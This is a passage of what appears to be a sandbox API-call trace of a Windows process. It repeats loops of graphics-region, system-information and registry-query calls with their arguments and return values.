(hrgnDst=0x1040a4b, hrgnSrc1=0x2704027d, hrgnSrc2=0x31040713, iMode=1) returned 1 [0017.550] CombineRgn (hrgnDst=0x1040a4c, hrgnSrc1=0x2704027d, hrgnSrc2=0x31040713, iMode=4) returned 2 [0017.550] CreateSolidBrush (color=0xff) returned 0x2100a4a [0017.550] CreateSolidBrush (color=0xff0000) returned 0x1100a4d [0017.550] DeleteObject (ho=0x1100a4d) returned 1 [0017.550] DeleteObject (ho=0x31040713) returned 1 [0017.550] DeleteObject (ho=0x2704027d) returned 1 [0017.551] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.551] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.551] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.551] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.551] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.551] BeginPath (hdc=0x0) returned 0 [0017.551] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.551] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.551] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.551] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.551] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.551] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.551] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.551] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.551] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x32040713 [0017.551] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2804027d [0017.551] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a4e [0017.551] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a4f [0017.551] CombineRgn (hrgnDst=0x1040a4e, hrgnSrc1=0x32040713, hrgnSrc2=0x2804027d, iMode=1) returned 1 [0017.551] CombineRgn (hrgnDst=0x1040a4f, hrgnSrc1=0x32040713, hrgnSrc2=0x2804027d, iMode=4) returned 2 [0017.551] CreateSolidBrush (color=0xff) returned 0x2100a4d [0017.551] CreateSolidBrush (color=0xff0000) returned 0x1100a50 [0017.551] DeleteObject (ho=0x1100a50) returned 1 [0017.551] DeleteObject (ho=0x2804027d) returned 1 [0017.551] DeleteObject (ho=0x32040713) returned 1 [0017.551] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.551] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.551] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.552] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.552] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.552] BeginPath (hdc=0x0) returned 0 [0017.552] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.552] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.552] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.552] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.552] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.552] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.552] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.552] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.552] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2904027d [0017.552] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x33040713 [0017.552] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a51 [0017.552] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a52 [0017.552] CombineRgn (hrgnDst=0x1040a51, hrgnSrc1=0x2904027d, hrgnSrc2=0x33040713, iMode=1) returned 1 [0017.552] CombineRgn (hrgnDst=0x1040a52, hrgnSrc1=0x2904027d, hrgnSrc2=0x33040713, iMode=4) returned 2 [0017.552] CreateSolidBrush (color=0xff) returned 0x2100a50 [0017.552] CreateSolidBrush (color=0xff0000) returned 0x1100a53 [0017.552] DeleteObject (ho=0x1100a53) returned 1 [0017.552] DeleteObject (ho=0x33040713) returned 1 [0017.552] DeleteObject (ho=0x2904027d) returned 1 [0017.552] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.552] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.552] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.552] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.552] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.552] BeginPath (hdc=0x0) returned 0 [0017.552] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.552] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.552] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.553] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.553] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.553] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.553] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.553] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x34040713 [0017.553] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2a04027d [0017.553] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a54 [0017.553] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a55 [0017.553] CombineRgn (hrgnDst=0x1040a54, hrgnSrc1=0x34040713, hrgnSrc2=0x2a04027d, iMode=1) returned 1 [0017.553] CombineRgn (hrgnDst=0x1040a55, hrgnSrc1=0x34040713, hrgnSrc2=0x2a04027d, iMode=4) returned 2 [0017.553] CreateSolidBrush (color=0xff) returned 0x2100a53 [0017.553] CreateSolidBrush (color=0xff0000) returned 0x1100a56 [0017.553] DeleteObject (ho=0x1100a56) returned 1 [0017.553] DeleteObject (ho=0x2a04027d) returned 1 [0017.553] DeleteObject (ho=0x34040713) returned 1 [0017.553] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.553] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.553] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.553] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.553] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.553] BeginPath (hdc=0x0) returned 0 [0017.553] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.553] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.553] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.553] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.553] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.553] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.553] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.554] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.554] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2b04027d [0017.554] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x35040713 [0017.554] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a57 [0017.554] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a58 [0017.554] CombineRgn (hrgnDst=0x1040a57, hrgnSrc1=0x2b04027d, hrgnSrc2=0x35040713, iMode=1) returned 1 [0017.554] CombineRgn (hrgnDst=0x1040a58, hrgnSrc1=0x2b04027d, hrgnSrc2=0x35040713, iMode=4) returned 2 [0017.554] CreateSolidBrush (color=0xff) returned 0x2100a56 [0017.554] CreateSolidBrush (color=0xff0000) returned 0x1100a59 [0017.554] DeleteObject (ho=0x1100a59) returned 1 [0017.554] DeleteObject (ho=0x35040713) returned 1 [0017.554] DeleteObject (ho=0x2b04027d) returned 1 [0017.554] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.554] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.554] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.554] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.554] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.554] BeginPath (hdc=0x0) returned 0 [0017.554] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.554] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.554] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.554] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.554] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.554] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.554] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.554] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.555] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x36040713 [0017.555] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2c04027d [0017.555] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a5a [0017.555] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a5b [0017.555] CombineRgn (hrgnDst=0x1040a5a, hrgnSrc1=0x36040713, hrgnSrc2=0x2c04027d, iMode=1) returned 1 [0017.555] CombineRgn (hrgnDst=0x1040a5b, hrgnSrc1=0x36040713, hrgnSrc2=0x2c04027d, iMode=4) returned 2 [0017.555] CreateSolidBrush (color=0xff) returned 0x2100a59 [0017.555] CreateSolidBrush (color=0xff0000) returned 0x1100a5c [0017.555] DeleteObject (ho=0x1100a5c) returned 1 [0017.555] DeleteObject (ho=0x2c04027d) returned 1 [0017.555] DeleteObject (ho=0x36040713) returned 1 [0017.555] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.555] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.555] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.555] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.555] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.555] BeginPath (hdc=0x0) returned 0 [0017.555] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.555] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.555] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.555] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.555] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.555] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.555] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.555] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.555] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2d04027d [0017.556] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x37040713 [0017.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a5d [0017.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a5e [0017.556] CombineRgn (hrgnDst=0x1040a5d, hrgnSrc1=0x2d04027d, hrgnSrc2=0x37040713, iMode=1) returned 1 [0017.556] CombineRgn (hrgnDst=0x1040a5e, hrgnSrc1=0x2d04027d, hrgnSrc2=0x37040713, iMode=4) returned 2 [0017.556] CreateSolidBrush (color=0xff) returned 0x2100a5c [0017.556] CreateSolidBrush (color=0xff0000) returned 0x1100a5f [0017.556] DeleteObject (ho=0x1100a5f) returned 1 [0017.556] DeleteObject (ho=0x37040713) returned 1 [0017.556] DeleteObject (ho=0x2d04027d) returned 1 [0017.556] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.556] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.556] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.556] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.556] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.556] BeginPath (hdc=0x0) returned 0 [0017.556] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.556] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.556] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.556] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.556] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.556] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.556] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.556] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.556] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x38040713 [0017.556] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2e04027d [0017.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a60 [0017.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a61 [0017.556] CombineRgn (hrgnDst=0x1040a60, hrgnSrc1=0x38040713, hrgnSrc2=0x2e04027d, iMode=1) returned 1 [0017.556] CombineRgn (hrgnDst=0x1040a61, hrgnSrc1=0x38040713, hrgnSrc2=0x2e04027d, iMode=4) returned 2 [0017.557] CreateSolidBrush (color=0xff) returned 0x2100a5f [0017.557] CreateSolidBrush (color=0xff0000) returned 0x1100a62 [0017.557] DeleteObject (ho=0x1100a62) returned 1 [0017.557] DeleteObject (ho=0x2e04027d) returned 1 [0017.557] DeleteObject (ho=0x38040713) returned 1 [0017.557] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.557] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.557] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.557] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.557] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.557] BeginPath (hdc=0x0) returned 0 [0017.557] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.557] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.557] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.557] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.557] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.557] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.557] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.557] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2f04027d [0017.557] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x39040713 [0017.557] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a63 [0017.557] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a64 [0017.557] CombineRgn (hrgnDst=0x1040a63, hrgnSrc1=0x2f04027d, hrgnSrc2=0x39040713, iMode=1) returned 1 [0017.557] CombineRgn (hrgnDst=0x1040a64, hrgnSrc1=0x2f04027d, hrgnSrc2=0x39040713, iMode=4) returned 2 [0017.557] CreateSolidBrush (color=0xff) returned 0x2100a62 [0017.557] CreateSolidBrush (color=0xff0000) returned 0x1100a65 [0017.557] DeleteObject (ho=0x1100a65) returned 1 [0017.558] DeleteObject (ho=0x39040713) returned 1 [0017.558] DeleteObject (ho=0x2f04027d) returned 1 [0017.558] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.558] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.558] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.558] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.558] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.558] BeginPath (hdc=0x0) returned 0 [0017.558] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.558] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.558] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.558] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.558] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.558] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.558] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.558] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3a040713 [0017.558] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3004027d [0017.558] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a66 [0017.558] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a67 [0017.558] CombineRgn (hrgnDst=0x1040a66, hrgnSrc1=0x3a040713, hrgnSrc2=0x3004027d, iMode=1) returned 1 [0017.558] CombineRgn (hrgnDst=0x1040a67, hrgnSrc1=0x3a040713, hrgnSrc2=0x3004027d, iMode=4) returned 2 [0017.558] CreateSolidBrush (color=0xff) returned 0x2100a65 [0017.558] CreateSolidBrush (color=0xff0000) returned 0x1100a68 [0017.558] DeleteObject (ho=0x1100a68) returned 1 [0017.558] DeleteObject (ho=0x3004027d) returned 1 [0017.558] DeleteObject (ho=0x3a040713) returned 1 [0017.558] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.558] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, 